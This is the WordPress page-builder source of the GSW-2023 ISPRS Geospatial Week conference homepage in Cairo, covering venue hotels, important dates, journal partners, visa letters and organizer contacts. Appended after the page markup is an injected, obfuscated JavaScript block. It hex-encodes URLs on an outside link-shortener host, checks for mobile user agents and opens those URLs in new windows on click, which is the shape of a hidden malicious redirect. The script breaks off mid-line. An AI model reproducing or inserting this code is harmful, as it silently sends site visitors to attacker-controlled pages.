#3366ff;\"><strong>+201221541515</strong></span></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span><br />\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508490939{margin-top: 50px !important;}\"]</p>\n<h1 style=\"text-align: center;\">Journals partner</h1>\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\n<h3></h3>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570507588{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Pharaohs Cruising Restaurant</strong></h5>\n<p><img class=\"alignnone size-medium wp-image-4791 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/828c1ce1-4aca-4e92-a1e0-3d71a816c9fc-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\n<h5 style=\"text-align: center;\">Dinner and Show on the Prime Le Lac Du Caire</h5>\n<p><img class=\"alignnone size-medium wp-image-4793 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/6c0414f1-abcc-46a4-8e17-e17eb60be7b5-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 